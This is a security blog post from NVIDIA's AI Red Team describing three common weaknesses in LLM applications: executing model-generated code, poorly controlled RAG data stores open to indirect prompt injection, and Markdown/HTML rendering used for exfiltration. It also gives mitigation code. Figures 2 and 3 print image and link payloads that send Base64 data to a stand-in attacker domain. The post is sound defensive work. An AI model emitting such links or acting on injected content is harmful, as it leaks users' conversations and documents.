Practical LLM Security Advice from the NVIDIA AI Red Team

Oct 02, 2025
Over the last several years, the NVIDIA AI Red Team (AIRT) has evaluated numerous and diverse AI-enabled systems for potential vulnerabilities and security weaknesses before they reach production. Across those assessments, AIRT has identified several recurring weaknesses that, if addressed during development, can significantly improve the security of LLM-based applications.

In this blog, we share key findings from those assessments and how to mitigate the most significant risks.

Common findings

Vulnerability 1: Executing LLM-generated code can lead to remote code execution

One of the most serious and recurring issues is using functions like exec or eval on LLM-generated output with insufficient isolation. While developers may use these functions to generate plots, they’re sometimes extended to more complex tasks, such as performing mathematical calculations, building SQL queries, or generating code for data analysis.

The risk? Attackers can use prompt injection, direct or indirect, to manipulate the LLM into producing malicious code. If that output is executed without proper sandboxing, it can lead to remote code execution (RCE), potentially giving attackers access to the full application environment.

Figure 1. A prompt injection used to gain remote code execution against a system that passes LLM-generated code into an exec statement to perform data analysis

The fix here is clear: avoid using exec, eval, or similar constructs, especially on LLM-generated code. These functions are inherently risky, and when combined with prompt injection, they can make RCE almost trivial. Even when exec or eval is buried deep inside a library and potentially protected by guardrails, an attacker can wrap a malicious command in layers of evasion and obfuscation to reach it.

In Figure 1, a prompt injection gains RCE by wrapping the final payload (pink) in guardrail evasions (green) and in prompt engineering that works around the system prompts introduced by calls in the library (blue and orange).

Instead, structure your application to parse the LLM response for intent or instructions and then map those to a predefined set of safe, explicitly permitted functions. If dynamic code execution is necessary, make sure it is executed in a secure, isolated sandbox environment. Our post on WebAssembly-based browser sandboxes outlines one way to approach this safely.
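
As a minimal sketch of the "parse for intent, then map to permitted functions" approach, the example below assumes the LLM has been prompted to answer with a small JSON object. The JSON shape, the function names `mean` and `total`, and the `dispatch` helper are all hypothetical and chosen only for illustration; a real application would define its own schema and operations.

```python
import json

# Hypothetical, explicitly permitted operations. Nothing outside this table
# can be reached, no matter what text the model produces.
def mean(values):
    return sum(values) / len(values)

def total(values):
    return sum(values)

ALLOWED_FUNCTIONS = {"mean": mean, "total": total}

def dispatch(llm_response: str):
    """Treat the model output as data, never as code, and call only allowlisted functions."""
    try:
        request = json.loads(llm_response)
    except json.JSONDecodeError as err:
        raise ValueError("LLM response is not valid JSON") from err
    if not isinstance(request, dict):
        raise ValueError("LLM response must be a JSON object")

    name = request.get("function")
    if not isinstance(name, str) or name not in ALLOWED_FUNCTIONS:
        raise ValueError(f"function {name!r} is not permitted")

    values = request.get("values")
    is_number_list = (
        isinstance(values, list)
        and len(values) > 0
        and all(isinstance(v, (int, float)) and not isinstance(v, bool) for v in values)
    )
    if not is_number_list:
        raise ValueError("values must be a non-empty list of numbers")

    return ALLOWED_FUNCTIONS[name](values)

if __name__ == "__main__":
    # Assumed model output for a request such as "average these three numbers".
    print(dispatch('{"function": "mean", "values": [1, 2, 3]}'))
```

With this structure, a successful prompt injection can at most select one of the permitted functions with validated arguments; it cannot introduce new code paths.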

Vulnerability 2: Insecure access control in retrieval-augmented generation data sources

Retrieval-augmented generation (RAG) is a widely adopted LLM application architecture that enables applications to incorporate up-to-date external data without retraining the model. The information retrieval step can also be a vector for attackers to inject data. In practice, we see two major weaknesses associated with RAG use:

First, permission to read sensitive information may not be correctly implemented on a per-user basis. When this happens, users may be able to access information in documents that they shouldn't be able to see. We commonly see this happen in the following ways:

  1. The permissions in the original source of the data (e.g., Confluence, Google Workspace) haven’t been correctly set and maintained. This error is then propagated to the RAG data store when the documents are ingested into the RAG database.
  2. The RAG data store doesn’t faithfully reproduce source-specific permissions, often by use of an overpermissioned “read” token to the original source of the documents. 
  3. Delays in propagating permissions from the source to the RAG database cause staleness issues and leave data exposed.

Reviewing how delegated authorization to the document or data sources is managed can help catch this issue early, so that teams can design around it.
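
One way to design around these issues is to re-check the requesting user's access at query time rather than relying only on permissions copied at ingestion. The sketch below is illustrative: the `Chunk` type, the in-memory `ACL` table, and the `can_read` callback are assumptions standing in for a call to the source system made with the user's own delegated credentials.

```python
from dataclasses import dataclass
from typing import Callable, Iterable, List

@dataclass(frozen=True)
class Chunk:
    doc_id: str   # identifier of the source document the chunk came from
    text: str

# Hypothetical stand-in for the source system's permissions
# (for example, the sharing settings of a workspace document).
ACL = {
    "hr-salaries": {"alice"},
    "eng-handbook": {"alice", "bob"},
}

def can_read(user_id: str, doc_id: str) -> bool:
    """Default-deny check: unknown documents are readable by nobody."""
    return user_id in ACL.get(doc_id, set())

def filter_by_permission(
    user_id: str,
    chunks: Iterable[Chunk],
    check: Callable[[str, str], bool] = can_read,
) -> List[Chunk]:
    """Drop retrieved chunks the user may not read before they reach the prompt."""
    return [chunk for chunk in chunks if check(user_id, chunk.doc_id)]

if __name__ == "__main__":
    retrieved = [
        Chunk("hr-salaries", "Salary bands for 2025 ..."),
        Chunk("eng-handbook", "How to request a code review ..."),
    ]
    for chunk in filter_by_permission("bob", retrieved):
        print(chunk.doc_id)
```

Checking at query time trades some latency for freshness: a permission revoked at the source takes effect on the next query instead of after the next ingestion run.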

The other serious vulnerability we commonly see is broad write access to the RAG data store. For instance, if a user's emails are part of the data in the retrieval phase of a RAG pipeline, anyone who knows this can send that user an email and have its content included in the data the RAG retriever returns. This opens the door to indirect prompt injection, which in some cases can be very precisely and narrowly targeted, making detection extremely difficult. This vulnerability is often an early element of an attack chain, with later objectives ranging from simply poisoning application results on a specific topic to exfiltrating the user's personal documents or data.

Mitigating broad write access to the RAG data store can be quite difficult, since it often impacts the desired functionality of the application. For example, being able to summarize a day’s worth of email is a potentially valuable and important use case. In this case, mitigation must occur at other places in the application or be designed around the specific application requirements.

In the case of email, enabling external emails to be excluded or accessed as a separate data source to avoid cross-contamination of results might be a useful approach.  In the case of workspace documents (e.g., SharePoint, Google Workspace), enabling a user to select between only their documents, documents only from people in their organization, and all documents may help limit the impact of maliciously shared documents.  
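
The scope selection described above could be sketched as a filter applied to candidate documents before retrieval. The `Scope` values, the `Document` fields, and the `restrict` helper are hypothetical names for illustration, and the sketch assumes that each document's owner and owning organization are recorded reliably at ingestion.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Iterable, List

class Scope(Enum):
    OWN = "own"                    # only the user's own documents
    ORGANIZATION = "organization"  # documents from people in the user's organization
    ALL = "all"                    # everything shared with the user, including external

@dataclass(frozen=True)
class Document:
    doc_id: str
    owner: str
    owner_org: str

def in_scope(doc: Document, user: str, user_org: str, scope: Scope) -> bool:
    if scope is Scope.OWN:
        return doc.owner == user
    if scope is Scope.ORGANIZATION:
        return doc.owner_org == user_org
    return True

def restrict(docs: Iterable[Document], user: str, user_org: str,
             scope: Scope = Scope.OWN) -> List[Document]:
    """Narrow the retrieval corpus to the scope the user selected (narrowest by default)."""
    return [doc for doc in docs if in_scope(doc, user, user_org, scope)]

if __name__ == "__main__":
    corpus = [
        Document("notes", owner="alice", owner_org="acme"),
        Document("roadmap", owner="bob", owner_org="acme"),
        Document("shared-by-stranger", owner="mallory", owner_org="elsewhere"),
    ]
    print([d.doc_id for d in restrict(corpus, "alice", "acme", Scope.ORGANIZATION)])
```

Defaulting to the narrowest scope means a maliciously shared external document only enters the results when the user has explicitly opted in to the widest setting.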

Content security policies (see the next vulnerability) can be used to reduce the risk of data exfiltration. Guardrail checks can be applied to augmented prompts or retrieved documents to ensure that they’re in fact on-topic for the query. Finally, authoritative documents or data sets for specific domains (e.g., HR-related information) can be established that are more tightly controlled to prevent malicious document injection.

Vulnerability 3: Active content rendering of LLM outputs

The use of Markdown (and other active content) to exfiltrate data has been a known issue since Johann Rehberger published about it in mid-2023. However, the AI Red Team still finds this vulnerability in LLM-powered applications.

If a link or image URL points the user's browser at an attacker's server, any content appended to that URL will appear in the attacker's server logs when the browser renders the image or the user clicks the link, as shown in Figure 2. To fetch the image data, the renderer must make a network call to the attacker's domain, and that same call can carry encoded sensitive data, exfiltrating it to the attacker. Indirect prompt injection can often be exploited to encode information such as the user's conversation history into a link, leading to data exfiltration.

<div class="markdown-body">
  <p>
    <img src="https://iamanevildomain.com/q?SGVsbG8hIFdlIGxpa2UgdhIGN1dCBvZiB5b3VyIGppYiEgRW1haWwgbWUgd2loCB0aGUgcGFzc3dvcmQgQVBQTEUgU0FVQ0Uh" alt="This is Fine">
  </p>
  <h3>Sources</h3>
</div>
Figure 2. Testing for image markdown rendering exfiltration, with the malicious payload automatically exfiltrating data by loading the image shown

Similarly, hyperlinks can hide the destination and any appended query data behind innocuous link text. The link in Figure 3 could exfiltrate Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp by encoding it in the query string as shown.

<a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-7mvu2w" href="https://iamanevildomain.com/q?Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp" node="[object Object]" target="_blank">click here to learn more!</a>
Figure 3. A chat session with the server returning a hyperlink
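
To make the mechanism concrete, the short sketch below shows how little work is needed on the receiving end: whoever operates the server only has to read the requested URL from the access log and decode the query string. It assumes the payload is plain Base64 placed directly in the query, as in the Figure 3 link; the function name `recover_exfiltrated_text` is ours.

```python
import base64
from urllib.parse import urlsplit

def recover_exfiltrated_text(requested_url: str) -> str:
    """Decode the Base64 payload carried in the query string of a logged request."""
    query = urlsplit(requested_url).query
    return base64.b64decode(query).decode("utf-8")

if __name__ == "__main__":
    # The URL from the Figure 3 hyperlink.
    url = "https://iamanevildomain.com/q?Tm93IHlvdSdyZSBqdXN0IHNob3dpbmcgb2ZmIDsp"
    print(recover_exfiltrated_text(url))  # prints: Now you're just showing off ;)
```

In a real attack, the encoded text would be whatever the injected prompt instructed the model to append, such as conversation history.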

To mitigate this vulnerability, we recommend one or more of the following:

  1. Use image content security policies that only allow images to be loaded from a predetermined list of “safe” sites. This prevents the user’s browser from rendering images automatically from an attacker’s servers. 
  2. For active hyperlinks, the application should display the entire link to the user before connecting to an external site, or links should be “inactive,” requiring a copy-paste operation to access the domain.
  3. Sanitize all LLM output to remove, as far as possible, Markdown, HTML, URLs, or other potential active content that is generated dynamically by the LLM.
  4. As a last resort, disable active content entirely within the user interface.
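
The first three recommendations can be sketched together as follows. This is a simplified illustration rather than a complete sanitizer: the allowlisted host `images.example.com` and the helper names are hypothetical, the regular expressions cover only inline Markdown images and links (not raw HTML or reference-style links), and a production system should prefer a maintained sanitization library alongside a browser-enforced content security policy.

```python
import re
from urllib.parse import urlsplit

# Hypothetical allowlist of hosts that may serve images to the chat UI.
ALLOWED_IMAGE_HOSTS = {"images.example.com"}

# Inline Markdown images: ![alt](url "optional title")
IMAGE_PATTERN = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")
# Inline Markdown links that are not images: [label](url "optional title")
LINK_PATTERN = re.compile(r"(?<!!)\[([^\]]*)\]\(([^)\s]+)[^)]*\)")

def image_csp_header():
    """Build a Content-Security-Policy header restricting where images load from."""
    sources = " ".join(f"https://{host}" for host in sorted(ALLOWED_IMAGE_HOSTS))
    return ("Content-Security-Policy", f"img-src 'self' {sources}")

def _is_allowed_image(url: str) -> bool:
    parts = urlsplit(url)
    return parts.scheme == "https" and (parts.hostname or "").lower() in ALLOWED_IMAGE_HOSTS

def sanitize_markdown(text: str) -> str:
    """Remove images from unlisted hosts and turn links into inactive, fully visible text."""
    def replace_image(match):
        alt, url = match.group(1), match.group(2)
        return match.group(0) if _is_allowed_image(url) else f"(image removed: {alt})"

    def replace_link(match):
        label, url = match.group(1), match.group(2)
        # Show the whole destination as inert code text instead of a clickable link.
        return f"{label} (`{url}`)"

    text = IMAGE_PATTERN.sub(replace_image, text)
    return LINK_PATTERN.sub(replace_link, text)

if __name__ == "__main__":
    llm_output = (
        "![This is Fine](https://iamanevildomain.com/q?c2VjcmV0) "
        "[click here to learn more!](https://iamanevildomain.com/q?c2VjcmV0)"
    )
    print(sanitize_markdown(llm_output))
    print(image_csp_header())
```

The header and the sanitizer are complementary: the policy is enforced by the browser even if a payload slips past the text filter, while the filter also handles links, which an `img-src` policy does not cover.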

Conclusion

The NVIDIA AI Red Team has assessed dozens of AI-powered applications and identified several straightforward recommendations for hardening and securing them. Our three most significant findings are execution of LLM-generated code leading to remote code execution, insecure permissions on RAG data stores enabling data leakage and/or indirect prompt injection, and active content rendering of LLM outputs leading to data exfiltration. By looking for and addressing these issues, you can secure your LLM implementation against the most common and impactful vulnerabilities.

If you’re interested in better understanding the fundamentals of adversarial machine learning, enroll in the self-paced online NVIDIA DLI training, Exploring Adversarial Machine Learning. To learn more about our ongoing work in this space, browse other NVIDIA Technical Blog posts on cybersecurity and AI security.


About the Authors

About Rich Harang
Rich Harang is a Principal Security Architect at NVIDIA, specializing in ML/AI systems, with over a decade of experience at the intersection of computer security, machine learning, and privacy. He received his PhD in Statistics from the University of California Santa Barbara in 2010. Prior to joining NVIDIA, he led the Algorithms Research team at Duo, led research on using machine learning models to detect malicious software, scripts, and web content at Sophos AI, and worked as a Team Lead at the US Army Research Laboratory. His research interests include adversarial machine learning, addressing bias and uncertainty in machine learning, and ways to use machine learning to support human analysis. Richard’s work has been presented at USENIX, BlackHat, IEEE S&P workshops, and DEF CON AI Village, among others, and has also been featured in The Register and KrebsOnSecurity.
About Joseph Lucas
Joe is a Principal Offensive Security Researcher focused on AI at NVIDIA. He is the founder and Chair of the NumFOCUS Security Committee and is a member of the Jupyter Security Council. He was one of the architects and hosts of the DEF CON 30 AI Village Capture the Flag competition and is passionate about machine learning security education. He served in the US Army at US Cyber Command and the 101st Airborne Division. He holds a master's degree in Computer Science from Georgia Institute of Technology and a bachelor's degree in Mathematics from the United States Military Academy.
About John Irwin
John Irwin is a senior security engineer focused on AI at NVIDIA. Prior to focusing on AI, he identified vulnerabilities and mitigations in many NVIDIA products, mostly focused on cloud and high-performance compute solutions. He has also competed in and occasionally run CTFs for over a decade. Before NVIDIA, he worked in Microsoft’s AI & Research org and as a consultant helping secure many different types of products. He holds a B.Sc. in Informatics from the University of Washington’s iSchool and an AS in computer science and engineering.
About Becca Lynch
Becca Lynch is an offensive security researcher on the NVIDIA AI Red Team, where she works to secure AI models and model infrastructure. Her prior work includes applied machine learning for anomaly detection at Duo Security, and leveraging data science expertise to build robust and actionable processes for threat hunting and intelligence. She earned her bachelor’s degree in Computer Science from the University of Michigan in 2018, and her master’s degree in Data Science from the University of Illinois in 2021. Becca’s work has been presented at Black Hat, DEF CON AI Village, and CAMLIS.
About Leon Derczynski
Leon Derczynski is principal research scientist in LLM security at NVIDIA and professor of natural language processing (NLP) at ITU Copenhagen. He has published over 100 NLP papers. Leon contributes to leading bodies on LLM security, is on the OWASP LLM Top 10 core team, works on ML Commons, and is the founder of the ACL SIG on NLP Security. Leon heads up the LLM vulnerability scanner garak with the NVIDIA NeMo Guardrails team.
About Erick Galinkin
Erick Galinkin is a research scientist at NVIDIA working on the security assessment and protection of large language models (LLMs). Previously, he led the AI research team at Rapid7 and has extensive experience working in the cybersecurity space. He is an alumnus of Johns Hopkins University and holds degrees in Applied Mathematics and Computer Science. Outside of his work, Erick is a lifelong student, currently at Drexel University, and is renowned for his ability to be around equestrians.
About Daniel Teixeira
Daniel Teixeira is a senior offensive security researcher and Red Team operator at NVIDIA, bringing over a decade of experience in penetration testing, vulnerability research, and red teaming. His research interests include adversary simulation, adversarial machine learning, agentic AI systems, MLOps, and LLMOps.

